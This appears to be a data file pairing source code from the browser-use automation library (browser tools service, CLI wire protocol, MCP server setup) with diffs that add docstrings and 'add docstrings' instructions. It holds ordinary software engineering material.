error_msg = f'Failed to execute JavaScript: {type(e).__name__}: {e}'
logger.debug(f'JavaScript code that failed: {code[:200]}...')
return ActionResult(error=error_msg)
def _validate_and_fix_javascript(self, code: str) -> str:
import re
# Pattern 1: Fix double-escaped quotes (\\\" → \")
fixed_code = re.sub(r'\\"', '"', code)
# Pattern 2: Fix over-escaped regex patterns (\\\\d → \\d)
# Common issue: regex gets double-escaped during parsing
fixed_code = re.sub(r'\\\\([dDsSwWbBnrtfv])', r'\\\1', fixed_code)
fixed_code = re.sub(r'\\\\([.*+?^${}()|[\]])', r'\\\1', fixed_code)
# Pattern 3: Fix XPath expressions with mixed quotes
xpath_pattern = r'document\.evaluate\s*\(\s*"([^"]*)"\s*,'
def fix_xpath_quotes(match):
xpath_with_quotes = match.group(1)
return f'document.evaluate(`{xpath_with_quotes}`,'
fixed_code = re.sub(xpath_pattern, fix_xpath_quotes, fixed_code)
# Pattern 4: Fix querySelector/querySelectorAll with mixed quotes
selector_pattern = r'(querySelector(?:All)?)\s*\(\s*"([^"]*)"\s*\)'
def fix_selector_quotes(match):
method_name = match.group(1)
selector_with_quotes = match.group(2)
return f'{method_name}(`{selector_with_quotes}`)'
fixed_code = re.sub(selector_pattern, fix_selector_quotes, fixed_code)
# Pattern 5: Fix closest() calls with mixed quotes
closest_pattern = r'\.closest\s*\(\s*"([^"]*)"\s*\)'
def fix_closest_quotes(match):
selector_with_quotes = match.group(1)
return f'.closest(`{selector_with_quotes}`)'
fixed_code = re.sub(closest_pattern, fix_closest_quotes, fixed_code)
# Pattern 6: Fix .matches() calls with mixed quotes (similar to closest)
matches_pattern = r'\.matches\s*\(\s*"([^"]*)"\s*\)'
def fix_matches_quotes(match):
selector_with_quotes = match.group(1)
return f'.matches(`{selector_with_quotes}`)'
fixed_code = re.sub(matches_pattern, fix_matches_quotes, fixed_code)
# Note: Removed getAttribute fix - attribute names rarely have mixed quotes
# getAttribute typically uses simple names like "data-value", not complex selectors
# Log changes made
changes_made = []
if r'\"' in code and r'\"' not in fixed_code:
changes_made.append('fixed escaped quotes')
if '`' in fixed_code and '`' not in code:
changes_made.append('converted mixed quotes to template literals')
if changes_made:
logger.debug(f'JavaScript fixes applied: {", ".join(changes_made)}')
return fixed_code
def _register_done_action(self, output_model: type[T] | None, display_files_in_done_text: bool = True):
if output_model is not None:
self.display_files_in_done_text = display_files_in_done_text
@self.registry.action(
'Complete task with structured output.',
param_model=StructuredOutputAction[output_model],
)
async def done(params: StructuredOutputAction, file_system: FileSystem, browser_session: BrowserSession):
# Exclude success from the output JSON
# Use mode='json' to properly serialize enums at all nesting levels
output_dict = params.data.model_dump(mode='json')
attachments: list[str] = []
# 1. Resolve any explicitly requested files via files_to_display
if params.files_to_display:
for file_name in params.files_to_display:
file_content = file_system.display_file(file_name)
if file_content:
attachments.append(str(file_system.get_dir() / file_name))
# 2. Auto-attach actual session downloads (CDP-tracked browser downloads)
# but NOT user-supplied whitelist paths from available_file_paths
session_downloads = browser_session.downloaded_files
if session_downloads:
existing = set(attachments)
for file_path in session_downloads:
if file_path not in existing:
attachments.append(file_path)
return ActionResult(
is_done=True,
success=params.success,
extracted_content=json.dumps(output_dict, ensure_ascii=False),
long_term_memory=f'Task completed. Success Status: {params.success}',
attachments=attachments,
)
else:
@self.registry.action(
'Complete task.',
param_model=DoneAction,
)
async def done(params: DoneAction, file_system: FileSystem):
user_message = params.text
len_text = len(params.text)
len_max_memory = 100
memory = f'Task completed: {params.success} - {params.text[:len_max_memory]}'
if len_text > len_max_memory:
memory += f' - {len_text - len_max_memory} more characters'
attachments = []
if params.files_to_display:
if self.display_files_in_done_text:
file_msg = ''
for file_name in params.files_to_display:
file_content = file_system.display_file(file_name)
if file_content:
file_msg += f'\n\n{file_name}:\n{file_content}'
attachments.append(file_name)
if file_msg:
user_message += '\n\nAttachments:'
user_message += file_msg
else:
logger.warning('Agent wanted to display files but none were found')
else:
for file_name in params.files_to_display:
file_content = file_system.display_file(file_name)
if file_content:
attachments.append(file_name)
attachments = [str(file_system.get_dir() / file_name) for file_name in attachments]
return ActionResult(
is_done=True,
success=params.success,
extracted_content=user_message,
long_term_memory=memory,
attachments=attachments,
)
def use_structured_output_action(self, output_model: type[T]):
self._output_model = output_model
self._register_done_action(output_model)
def get_output_model(self) -> type[BaseModel] | None:
return self._output_model
# Register ---------------------------------------------------------------
def action(self, description: str, **kwargs):
return self.registry.action(description, **kwargs)
def exclude_action(self, action_name: str) -> None:
self.registry.exclude_action(action_name)
def _register_click_action(self) -> None:
# Remove existing click action if present
if 'click' in self.registry.registry.actions:
del self.registry.registry.actions['click']
if self._coordinate_clicking_enabled:
# Register click action WITH coordinate support
@self.registry.action(
'Click element by index or coordinates. Use coordinates only if the index is not available. Either provide coordinates or index.',
param_model=ClickElementAction,
)
async def click(params: ClickElementAction, browser_session: BrowserSession):
# Validate that either index or coordinates are provided
if params.index is None and (params.coordinate_x is None or params.coordinate_y is None):
return ActionResult(error='Must provide either index or both coordinate_x and coordinate_y')
# Try index-based clicking first if index is provided
if params.index is not None:
return await self._click_by_index(params, browser_session)
# Coordinate-based clicking when index is not provided
else:
return await self._click_by_coordinate(params, browser_session)
else:
# Register click action WITHOUT coordinate support (index only)
@self.registry.action(
'Click element by index.',
param_model=ClickElementActionIndexOnly,
)
async def click(params: ClickElementActionIndexOnly, browser_session: BrowserSession):
return await self._click_by_index(params, browser_session)
def set_coordinate_clicking(self, enabled: bool) -> None:
if enabled == self._coordinate_clicking_enabled:
return # No change needed
self._coordinate_clicking_enabled = enabled
self._register_click_action()
logger.debug(f'Coordinate clicking {"enabled" if enabled else "disabled"}')
# Act --------------------------------------------------------------------
@observe_debug(ignore_input=True, ignore_output=True, name='act')
@time_execution_sync('--act')
async def act(
self,
action: ActionModel,
browser_session: BrowserSession,
page_extraction_llm: BaseChatModel | None = None,
sensitive_data: dict[str, str | dict[str, str]] | None = None,
available_file_paths: list[str] | None = None,
file_system: FileSystem | None = None,
extraction_schema: dict | None = None,
) -> ActionResult:
for action_name, params in action.model_dump(exclude_unset=True).items():
if params is not None:
# Use Laminar span if available, otherwise use no-op context manager
if Laminar is not None:
span_context = Laminar.start_as_current_span(
name=action_name,
input={
'action': action_name,
'params': params,
},
span_type='TOOL',
)
else:
# No-op context manager when lmnr is not available
from contextlib import nullcontext
span_context = nullcontext()
with span_context:
try:
result = await self.registry.execute_action(
action_name=action_name,
params=params,
browser_session=browser_session,
page_extraction_llm=page_extraction_llm,
file_system=file_system,
sensitive_data=sensitive_data,
available_file_paths=available_file_paths,
extraction_schema=extraction_schema,
)
except BrowserError as e:
logger.error(f'❌ Action {action_name} failed with BrowserError: {str(e)}')
result = handle_browser_error(e)
except TimeoutError as e:
logger.error(f'❌ Action {action_name} failed with TimeoutError: {str(e)}')
result = ActionResult(error=f'{action_name} was not executed due to timeout.')
except Exception as e:
# Log the original exception with traceback for observability
logger.error(f"Action '{action_name}' failed with error: {str(e)}")
result = ActionResult(error=str(e))
if Laminar is not None:
Laminar.set_span_output(result)
if isinstance(result, str):
return ActionResult(extracted_content=result)
elif isinstance(result, ActionResult):
return result
elif result is None:
return ActionResult()
else:
raise ValueError(f'Invalid action result type: {type(result)} of {result}')
return ActionResult()
def __getattr__(self, name: str):
# Check if this is a registered action
if name in self.registry.registry.actions:
from typing import Union
from pydantic import create_model
action = self.registry.registry.actions[name]
# Create a wrapper that calls act() to ensure consistent error handling and result normalization
async def action_wrapper(**kwargs):
# Extract browser_session (required positional argument for act())
browser_session = kwargs.get('browser_session')
# Separate action params from special params (injected dependencies)
special_param_names = {
'browser_session',
'page_extraction_llm',
'file_system',
'available_file_paths',
'sensitive_data',
'extraction_schema',
}
# Extract action params (params for the action itself)
action_params = {k: v for k, v in kwargs.items() if k not in special_param_names}
# Extract special params (injected dependencies) - exclude browser_session as it's positional
special_kwargs = {k: v for k, v in kwargs.items() if k in special_param_names and k != 'browser_session'}
# Create the param instance
params_instance = action.param_model(**action_params)
# Dynamically create an ActionModel with this action
# Use Union for type compatibility with create_model
DynamicActionModel = create_model(
'DynamicActionModel',
__base__=ActionModel,
**{name: (Union[action.param_model, None], None)}, # type: ignore
)
# Create the action model instance
action_model = DynamicActionModel(**{name: params_instance})
# Call act() which has all the error handling, result normalization, and observability
# browser_session is passed as positional argument (required by act())
return await self.act(action=action_model, browser_session=browser_session, **special_kwargs) # type: ignore
return action_wrapper
# If not an action, raise AttributeError for normal Python behavior
raise AttributeError(f"'{type(self).__name__}' object has no attribute '{name}'")
# Alias for backwards compatibility
Controller = Tools
class CodeAgentTools(Tools[Context]):
def __init__(
self,
exclude_actions: list[str] | None = None,
output_model: type[T] | None = None,
display_files_in_done_text: bool = True,
):
# Default exclusions for CodeAgent agent
if exclude_actions is None:
exclude_actions = [
# 'scroll', # Keep for code-use
'extract', # Exclude - use Python + evaluate()
'find_text', # Exclude - use Python string ops
# 'select_dropdown', # Keep for code-use
# 'dropdown_options', # Keep for code-use
'screenshot', # Exclude - not needed
'search', # Exclude - use navigate() directly
# 'click', # Keep for code-use
# 'input', # Keep for code-use
# 'switch', # Keep for code-use
# 'send_keys', # Keep for code-use
# 'close', # Keep for code-use
# 'go_back', # Keep for code-use
# 'upload_file', # Keep for code-use
# Exclude file system actions - CodeAgent should use Python file operations
'write_file',
'read_file',
'replace_file',
]
super().__init__(
exclude_actions=exclude_actions,
output_model=output_model,
display_files_in_done_text=display_files_in_done_text,
)
# Override done action for CodeAgent with enhanced file handling
self._register_code_use_done_action(output_model, display_files_in_done_text)
def _register_code_use_done_action(self, output_model: type[T] | None, display_files_in_done_text: bool = True):
if output_model is not None:
# Structured output done - use parent's implementation
return
# Override the done action with enhanced version
@self.registry.action(
'Complete task.',
param_model=DoneAction,
)
async def done(params: DoneAction, file_system: FileSystem):
user_message = params.text
len_text = len(params.text)
len_max_memory = 100
memory = f'Task completed: {params.success} - {params.text[:len_max_memory]}'
if len_text > len_max_memory:
memory += f' - {len_text - len_max_memory} more characters'
attachments = []
if params.files_to_display:
if self.display_files_in_done_text:
file_msg = ''
for file_name in params.files_to_display:
file_content = file_system.display_file(file_name)
if file_content:
file_msg += f'\n\n{file_name}:\n{file_content}'
attachments.append(file_name)
elif os.path.exists(file_name):
# File exists on disk but not in FileSystem - just add to attachments
attachments.append(file_name)
if file_msg:
user_message += '\n\nAttachments:'
user_message += file_msg
else:
logger.warning('Agent wanted to display files but none were found')
else:
for file_name in params.files_to_display:
file_content = file_system.display_file(file_name)
if file_content:
attachments.append(file_name)
elif os.path.exists(file_name):
attachments.append(file_name)
# Convert relative paths to absolute paths - handle both FileSystem-managed and regular files
resolved_attachments = []
for file_name in attachments:
if os.path.isabs(file_name):
# Already absolute
resolved_attachments.append(file_name)
elif file_system.get_file(file_name):
# Managed by FileSystem
resolved_attachments.append(str(file_system.get_dir() / file_name))
elif os.path.exists(file_name):
# Regular file in current directory
resolved_attachments.append(os.path.abspath(file_name))
else:
# File doesn't exist, but include the path anyway for error visibility
resolved_attachments.append(str(file_system.get_dir() / file_name))
attachments = resolved_attachments
return ActionResult(
is_done=True,
success=params.success,
extracted_content=user_message,
long_term_memory=memory,
attachments=attachments,
)
# Override upload_file for code agent with relaxed path validation
@self.registry.action(
'Upload a file to a file input element. For code-use mode, any file accessible from the current directory can be uploaded.',
param_model=UploadFileAction,
)
async def upload_file(
params: UploadFileAction,
browser_session: BrowserSession,
available_file_paths: list[str],
file_system: FileSystem,
):
# Path validation logic for code-use mode:
# 1. If available_file_paths provided (security mode), enforce it as a whitelist
# 2. If no whitelist, for local browsers just check file exists
# 3. For remote browsers, allow any path (assume it exists remotely)
# If whitelist provided, validate path is in it
if available_file_paths:
if params.path not in available_file_paths:
# Also check if it's a recently downloaded file
downloaded_files = browser_session.downloaded_files
if params.path not in downloaded_files:
# Finally, check if it's a file in the FileSystem service (if provided)
if file_system is not None and file_system.get_dir():
# Check if the file is actually managed by the FileSystem service
# The path should be just the filename for FileSystem files
file_obj = file_system.get_file(params.path)
if file_obj:
# File is managed by FileSystem, construct the full path
file_system_path = str(file_system.get_dir() / params.path)
params = UploadFileAction(index=params.index, path=file_system_path)
else:
# If browser is remote, allow passing a remote-accessible absolute path
if not browser_session.is_local:
pass
else:
msg = f'File path {params.path} is not available. To fix: add this file path to the available_file_paths parameter when creating the Agent. Example: Agent(task="...", llm=llm, browser=browser, available_file_paths=["{params.path}"])'
logger.error(f'❌ {msg}')
return ActionResult(error=msg)
else:
# If browser is remote, allow passing a remote-accessible absolute path
if not browser_session.is_local:
pass
else:
msg = f'File path {params.path} is not available. To fix: add this file path to the available_file_paths parameter when creating the Agent. Example: Agent(task="...", llm=llm, browser=browser, available_file_paths=["{params.path}"])'
logger.error(f'❌ {msg}')
return ActionResult(error=msg)
# For local browsers, ensure the file exists on the local filesystem
if browser_session.is_local:
if not os.path.exists(params.path):
msg = f'File {params.path} does not exist'
return ActionResult(error=msg)
# Get the selector map to find the node
selector_map = await browser_session.get_selector_map()
if params.index not in selector_map:
msg = f'Element with index {params.index} does not exist.'
return ActionResult(error=msg)
node = selector_map[params.index]
# Helper function to find file input near the selected element
def find_file_input_near_element(
node: EnhancedDOMTreeNode, max_height: int = 3, max_descendant_depth: int = 3
) -> EnhancedDOMTreeNode | None:
def find_file_input_in_descendants(n: EnhancedDOMTreeNode, depth: int) -> EnhancedDOMTreeNode | None:
if depth < 0:
return None
if browser_session.is_file_input(n):
return n
for child in n.children_nodes or []:
result = find_file_input_in_descendants(child, depth - 1)
if result:
return result
return None
current = node
for _ in range(max_height + 1):
# Check the current node itself
if browser_session.is_file_input(current):
return current
# Check all descendants of the current node
result = find_file_input_in_descendants(current, max_descendant_depth)
if result:
return result
# Check all siblings and their descendants
if current.parent_node:
for sibling in current.parent_node.children_nodes or []:
if sibling is current:
continue
if browser_session.is_file_input(sibling):
return sibling
result = find_file_input_in_descendants(sibling, max_descendant_depth)
if result:
return result
current = current.parent_node
if not current:
break
return None
# Try to find a file input element near the selected element
file_input_node = find_file_input_near_element(node)
# Highlight the file input element if found (truly non-blocking)
if file_input_node:
create_task_with_error_handling(
browser_session.highlight_interaction_element(file_input_node),
name='highlight_file_input',
suppress_exceptions=True,
)
# If not found near the selected element, fallback to finding the closest file input to current scroll position
if file_input_node is None:
logger.info(
f'No file upload element found near index {params.index}, searching for closest file input to scroll position'
)
# Get current scroll position
cdp_session = await browser_session.get_or_create_cdp_session()
try:
scroll_info = await cdp_session.cdp_client.send.Runtime.evaluate(
params={'expression': 'window.scrollY || window.pageYOffset || 0'}, session_id=cdp_session.session_id
)
current_scroll_y = scroll_info.get('result', {}).get('value', 0)
except Exception:
current_scroll_y = 0
# Find all file inputs in the selector map and pick the closest one to scroll position
closest_file_input = None
min_distance = float('inf')
for idx, element in selector_map.items():
if browser_session.is_file_input(element):
# Get element's Y position
if element.absolute_position:
element_y = element.absolute_position.y
distance = abs(element_y - current_scroll_y)
if distance < min_distance:
min_distance = distance
closest_file_input = element
if closest_file_input:
file_input_node = closest_file_input
logger.info(f'Found file input closest to scroll position (distance: {min_distance}px)')
# Highlight the fallback file input element (truly non-blocking)
create_task_with_error_handling(
browser_session.highlight_interaction_element(file_input_node),
name='highlight_file_input_fallback',
suppress_exceptions=True,
)
else:
msg = 'No file upload element found on the page'
logger.error(msg)
raise BrowserError(msg)
# TODO: figure out why this fails sometimes + add fallback hail mary, just look for any file input on page
# Dispatch upload file event with the file input node
try:
event = browser_session.event_bus.dispatch(UploadFileEvent(node=file_input_node, file_path=params.path))
await event
await event.event_result(raise_if_any=True, raise_if_none=False)
msg = f'Successfully uploaded file to index {params.index}'
logger.info(f'📁 {msg}')
return ActionResult(
extracted_content=msg,
long_term_memory=f'Uploaded file {params.path} to element {params.index}',
)
except Exception as e:
logger.error(f'Failed to upload file: {e}')
raise BrowserError(f'Failed to upload file: {e}') | --- +++ @@ -75,6 +75,7 @@
def _detect_sensitive_key_name(text: str, sensitive_data: dict[str, str | dict[str, str]] | None) -> str | None:
+ """Detect which sensitive key name corresponds to the given text value."""
if not sensitive_data or not text:
return None
@@ -230,6 +231,7 @@ css_scope: str | None,
max_results: int,
) -> str:
+ """Build JS IIFE for search_page with safe parameter injection."""
params_js = (
f'var PATTERN = {json.dumps(pattern)};\n'
f'var IS_REGEX = {json.dumps(regex)};\n'
@@ -247,6 +249,7 @@ max_results: int,
include_text: bool,
) -> str:
+ """Build JS IIFE for find_elements with safe parameter injection."""
params_js = (
f'var SELECTOR = {json.dumps(selector)};\n'
f'var ATTRIBUTES = {json.dumps(attributes)};\n'
@@ -257,6 +260,7 @@
def _format_search_results(data: dict, pattern: str) -> str:
+ """Format search_page CDP result into human-readable text for the agent."""
if not isinstance(data, dict):
return f'search_page returned unexpected result: {data}'
@@ -282,6 +286,7 @@
def _format_find_results(data: dict, selector: str) -> str:
+ """Format find_elements CDP result into human-readable text for the agent."""
if not isinstance(data, dict):
return f'find_elements returned unexpected result: {data}'
@@ -322,6 +327,7 @@
def _is_autocomplete_field(node: EnhancedDOMTreeNode) -> bool:
+ """Detect if a node is an autocomplete/combobox field from its attributes."""
attrs = node.attributes or {}
if attrs.get('role') == 'combobox':
return True
@@ -492,6 +498,7 @@
# Helper function for coordinate conversion
def _convert_llm_coordinates_to_viewport(llm_x: int, llm_y: int, browser_session: BrowserSession) -> tuple[int, int]:
+ """Convert coordinates from LLM screenshot size to original viewport size."""
if browser_session.llm_screenshot_size and browser_session._original_viewport_size:
original_width, original_height = browser_session._original_viewport_size
llm_width, llm_height = browser_session.llm_screenshot_size
@@ -512,6 +519,9 @@ browser_session: BrowserSession,
tabs_before: set[str],
) -> str:
+ """Detect if a click opened a new tab, and return a note for the agent.
+ Waits briefly for CDP events to propagate, then checks if any new tabs appeared.
+ """
try:
# Brief delay to allow CDP Target.attachedToTarget events to propagate
# and be processed by SessionManager._handle_target_attached
@@ -786,6 +796,7 @@ def find_file_input_near_element(
node: EnhancedDOMTreeNode, max_height: int = 3, max_descendant_depth: int = 3
) -> EnhancedDOMTreeNode | None:
+ """Find the closest file input to the selected element."""
def find_file_input_in_descendants(n: EnhancedDOMTreeNode, depth: int) -> EnhancedDOMTreeNode | None:
if depth < 0:
@@ -1412,6 +1423,7 @@ browser_session: BrowserSession,
file_system: FileSystem,
):
+ """Take screenshot, optionally saving to file."""
if params.file_name:
# Save screenshot to file
file_name = params.file_name
@@ -1451,6 +1463,7 @@ browser_session: BrowserSession,
file_system: FileSystem,
):
+ """Save the current page as a PDF using CDP Page.printToPDF."""
import base64
import re
@@ -1535,6 +1548,7 @@ param_model=GetDropdownOptionsAction,
)
async def dropdown_options(params: GetDropdownOptionsAction, browser_session: BrowserSession):
+ """Get all options from a native dropdown or ARIA menu"""
# Look up the node from the selector map
node = await browser_session.get_element_by_index(params.index)
if node is None:
@@ -1562,6 +1576,7 @@ param_model=SelectDropdownOptionAction,
)
async def select_dropdown(params: SelectDropdownOptionAction, browser_session: BrowserSession):
+ """Select dropdown option by the text of the option you want to select"""
# Look up the node from the selector map
node = await browser_session.get_element_by_index(params.index)
if node is None:
@@ -1791,6 +1806,7 @@ return ActionResult(error=error_msg)
def _validate_and_fix_javascript(self, code: str) -> str:
+ """Validate and fix common JavaScript issues before execution"""
import re
@@ -1943,17 +1959,31 @@ self._register_done_action(output_model)
def get_output_model(self) -> type[BaseModel] | None:
+ """Get the output model if structured output is configured."""
return self._output_model
# Register ---------------------------------------------------------------
def action(self, description: str, **kwargs):
+ """Decorator for registering custom actions
+
+ @param description: Describe the LLM what the function does (better description == better function calling)
+ """
return self.registry.action(description, **kwargs)
def exclude_action(self, action_name: str) -> None:
+ """Exclude an action from the tools registry.
+
+ This method can be used to remove actions after initialization,
+ useful for enforcing constraints like disabling screenshot when use_vision != 'auto'.
+
+ Args:
+ action_name: Name of the action to exclude (e.g., 'screenshot')
+ """
self.registry.exclude_action(action_name)
def _register_click_action(self) -> None:
+ """Register the click action with or without coordinate support based on current setting."""
# Remove existing click action if present
if 'click' in self.registry.registry.actions:
del self.registry.registry.actions['click']
@@ -1985,6 +2015,20 @@ return await self._click_by_index(params, browser_session)
def set_coordinate_clicking(self, enabled: bool) -> None:
+ """Enable or disable coordinate-based clicking.
+
+ When enabled, the click action accepts both index and coordinate parameters.
+ When disabled (default), only index-based clicking is available.
+
+ This is automatically enabled for models that support coordinate clicking:
+ - claude-sonnet-4-5
+ - claude-opus-4-5
+ - gemini-3-pro
+ - browser-use/* models
+
+ Args:
+ enabled: True to enable coordinate clicking, False to disable
+ """
if enabled == self._coordinate_clicking_enabled:
return # No change needed
@@ -2005,6 +2049,7 @@ file_system: FileSystem | None = None,
extraction_schema: dict | None = None,
) -> ActionResult:
+ """Execute an action"""
for action_name, params in action.model_dump(exclude_unset=True).items():
if params is not None:
@@ -2061,6 +2106,10 @@ return ActionResult()
def __getattr__(self, name: str):
+ """
+ Enable direct action calls like tools.navigate(url=..., browser_session=...).
+ This provides a simpler API for tests and direct usage while maintaining backward compatibility.
+ """
# Check if this is a registered action
if name in self.registry.registry.actions:
from typing import Union
@@ -2119,6 +2168,23 @@
class CodeAgentTools(Tools[Context]):
+ """Specialized Tools for CodeAgent agent optimized for Python-based browser automation.
+
+ Includes:
+ - All browser interaction tools (click, input, scroll, navigate, etc.)
+ - JavaScript evaluation
+ - Tab management (switch, close)
+ - Navigation actions (go_back)
+ - Upload file support
+ - Dropdown interactions
+
+ Excludes (optimized for code-use mode):
+ - extract: Use Python + evaluate() instead
+ - find_text: Use Python string operations
+ - screenshot: Not needed in code-use mode
+ - search: Use navigate() directly
+ - File system actions (write_file, read_file, replace_file): Use Python file operations instead
+ """
def __init__(
self,
@@ -2159,6 +2225,7 @@ self._register_code_use_done_action(output_model, display_files_in_done_text)
def _register_code_use_done_action(self, output_model: type[T] | None, display_files_in_done_text: bool = True):
+ """Register enhanced done action for CodeAgent that can read files from disk."""
if output_model is not None:
# Structured output done - use parent's implementation
return
@@ -2293,6 +2360,7 @@ def find_file_input_near_element(
node: EnhancedDOMTreeNode, max_height: int = 3, max_descendant_depth: int = 3
) -> EnhancedDOMTreeNode | None:
+ """Find the closest file input to the selected element."""
def find_file_input_in_descendants(n: EnhancedDOMTreeNode, depth: int) -> EnhancedDOMTreeNode | None:
if depth < 0:
@@ -2399,4 +2467,4 @@ )
except Exception as e:
logger.error(f'Failed to upload file: {e}')
- raise BrowserError(f'Failed to upload file: {e}')+ raise BrowserError(f'Failed to upload file: {e}')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tools/service.py |
Add docstrings to meet PEP guidelines |
import json
from dataclasses import asdict, dataclass, field
from typing import Any
@dataclass
class Request:
id: str
action: str
session: str
params: dict[str, Any] = field(default_factory=dict)
def to_json(self) -> str:
return json.dumps(asdict(self))
@classmethod
def from_json(cls, data: str) -> 'Request':
d = json.loads(data)
return cls(
id=d['id'],
action=d['action'],
session=d['session'],
params=d.get('params', {}),
)
@dataclass
class Response:
id: str
success: bool
data: Any = None
error: str | None = None
def to_json(self) -> str:
return json.dumps(asdict(self))
@classmethod
def from_json(cls, data: str) -> 'Response':
d = json.loads(data)
return cls(
id=d['id'],
success=d['success'],
data=d.get('data'),
error=d.get('error'),
) | --- +++ @@ -1,3 +1,7 @@+"""Wire protocol for CLI↔Server communication.
+
+Uses JSON over Unix sockets (or TCP on Windows) with newline-delimited messages.
+"""
import json
from dataclasses import asdict, dataclass, field
@@ -6,6 +10,7 @@
@dataclass
class Request:
+ """Command request from CLI to server."""
id: str
action: str
@@ -28,6 +33,7 @@
@dataclass
class Response:
+ """Response from server to CLI."""
id: str
success: bool
@@ -45,4 +51,4 @@ success=d['success'],
data=d.get('data'),
error=d.get('error'),
- )+ )
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/protocol.py |
Write docstrings describing functionality |
import os
import sys
# Set environment variables BEFORE any browser_use imports to prevent early logging
os.environ['BROWSER_USE_LOGGING_LEVEL'] = 'critical'
os.environ['BROWSER_USE_SETUP_LOGGING'] = 'false'
import asyncio
import json
import logging
import time
from pathlib import Path
from typing import Any
from browser_use.llm import ChatAWSBedrock
# Configure logging for MCP mode - redirect to stderr but preserve critical diagnostics
logging.basicConfig(
stream=sys.stderr, level=logging.WARNING, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', force=True
)
try:
import psutil
PSUTIL_AVAILABLE = True
except ImportError:
PSUTIL_AVAILABLE = False
# Add browser-use to path if running from source
sys.path.insert(0, str(Path(__file__).parent.parent))
# Import and configure logging to use stderr before other imports
from browser_use.logging_config import setup_logging
def _configure_mcp_server_logging():
# Set environment to suppress browser-use logging during server mode
os.environ['BROWSER_USE_LOGGING_LEVEL'] = 'warning'
os.environ['BROWSER_USE_SETUP_LOGGING'] = 'false' # Prevent automatic logging setup
# Configure logging to stderr for MCP mode - preserve warnings and above for troubleshooting
setup_logging(stream=sys.stderr, log_level='warning', force_setup=True)
# Also configure the root logger and all existing loggers to use stderr
logging.root.handlers = []
stderr_handler = logging.StreamHandler(sys.stderr)
stderr_handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logging.root.addHandler(stderr_handler)
logging.root.setLevel(logging.CRITICAL)
# Configure all existing loggers to use stderr and CRITICAL level
for name in list(logging.root.manager.loggerDict.keys()):
logger_obj = logging.getLogger(name)
logger_obj.handlers = []
logger_obj.setLevel(logging.CRITICAL)
logger_obj.addHandler(stderr_handler)
logger_obj.propagate = False
# Configure MCP server logging before any browser_use imports to capture early log lines
_configure_mcp_server_logging()
# Additional suppression - disable all logging completely for MCP mode
logging.disable(logging.CRITICAL)
# Import browser_use modules
from browser_use import ActionModel, Agent
from browser_use.browser import BrowserProfile, BrowserSession
from browser_use.config import get_default_llm, get_default_profile, load_browser_use_config
from browser_use.filesystem.file_system import FileSystem
from browser_use.llm.openai.chat import ChatOpenAI
from browser_use.tools.service import Tools
logger = logging.getLogger(__name__)
def _ensure_all_loggers_use_stderr():
# Get the stderr handler
stderr_handler = None
for handler in logging.root.handlers:
if hasattr(handler, 'stream') and handler.stream == sys.stderr: # type: ignore
stderr_handler = handler
break
if not stderr_handler:
stderr_handler = logging.StreamHandler(sys.stderr)
stderr_handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
# Configure root logger
logging.root.handlers = [stderr_handler]
logging.root.setLevel(logging.CRITICAL)
# Configure all existing loggers
for name in list(logging.root.manager.loggerDict.keys()):
logger_obj = logging.getLogger(name)
logger_obj.handlers = [stderr_handler]
logger_obj.setLevel(logging.CRITICAL)
logger_obj.propagate = False
# Ensure stderr logging after all imports
_ensure_all_loggers_use_stderr()
# Try to import MCP SDK
try:
import mcp.server.stdio
import mcp.types as types
from mcp.server import NotificationOptions, Server
from mcp.server.models import InitializationOptions
MCP_AVAILABLE = True
# Configure MCP SDK logging to stderr as well
mcp_logger = logging.getLogger('mcp')
mcp_logger.handlers = []
mcp_logger.addHandler(logging.root.handlers[0] if logging.root.handlers else logging.StreamHandler(sys.stderr))
mcp_logger.setLevel(logging.ERROR)
mcp_logger.propagate = False
except ImportError:
MCP_AVAILABLE = False
logger.error('MCP SDK not installed. Install with: pip install mcp')
sys.exit(1)
from browser_use.telemetry import MCPServerTelemetryEvent, ProductTelemetry
from browser_use.utils import create_task_with_error_handling, get_browser_use_version
def get_parent_process_cmdline() -> str | None:
if not PSUTIL_AVAILABLE:
return None
try:
cmdlines = []
current_process = psutil.Process()
parent = current_process.parent()
while parent:
try:
cmdline = parent.cmdline()
if cmdline:
cmdlines.append(' '.join(cmdline))
except (psutil.AccessDenied, psutil.NoSuchProcess):
# Skip processes we can't access (like system processes)
pass
try:
parent = parent.parent()
except (psutil.AccessDenied, psutil.NoSuchProcess):
# Can't go further up the chain
break
return ';'.join(cmdlines) if cmdlines else None
except Exception:
# If we can't get parent process info, just return None
return None
class BrowserUseServer:
def __init__(self, session_timeout_minutes: int = 10):
# Ensure all logging goes to stderr (in case new loggers were created)
_ensure_all_loggers_use_stderr()
self.server = Server('browser-use')
self.config = load_browser_use_config()
self.agent: Agent | None = None
self.browser_session: BrowserSession | None = None
self.tools: Tools | None = None
self.llm: ChatOpenAI | None = None
self.file_system: FileSystem | None = None
self._telemetry = ProductTelemetry()
self._start_time = time.time()
# Session management
self.active_sessions: dict[str, dict[str, Any]] = {} # session_id -> session info
self.session_timeout_minutes = session_timeout_minutes
self._cleanup_task: Any = None
# Setup handlers
self._setup_handlers()
def _setup_handlers(self):
@self.server.list_tools()
async def handle_list_tools() -> list[types.Tool]:
return [
# Agent tools
# Direct browser control tools
types.Tool(
name='browser_navigate',
description='Navigate to a URL in the browser',
inputSchema={
'type': 'object',
'properties': {
'url': {'type': 'string', 'description': 'The URL to navigate to'},
'new_tab': {'type': 'boolean', 'description': 'Whether to open in a new tab', 'default': False},
},
'required': ['url'],
},
),
types.Tool(
name='browser_click',
description='Click an element by index or at specific viewport coordinates. Use index for elements from browser_get_state, or coordinate_x/coordinate_y for pixel-precise clicking.',
inputSchema={
'type': 'object',
'properties': {
'index': {
'type': 'integer',
'description': 'The index of the element to click (from browser_get_state). Use this OR coordinates.',
},
'coordinate_x': {
'type': 'integer',
'description': 'X coordinate (pixels from left edge of viewport). Use with coordinate_y.',
},
'coordinate_y': {
'type': 'integer',
'description': 'Y coordinate (pixels from top edge of viewport). Use with coordinate_x.',
},
'new_tab': {
'type': 'boolean',
'description': 'Whether to open any resulting navigation in a new tab',
'default': False,
},
},
'oneOf': [
{'required': ['index']},
{'required': ['coordinate_x', 'coordinate_y']},
],
},
),
types.Tool(
name='browser_type',
description='Type text into an input field',
inputSchema={
'type': 'object',
'properties': {
'index': {
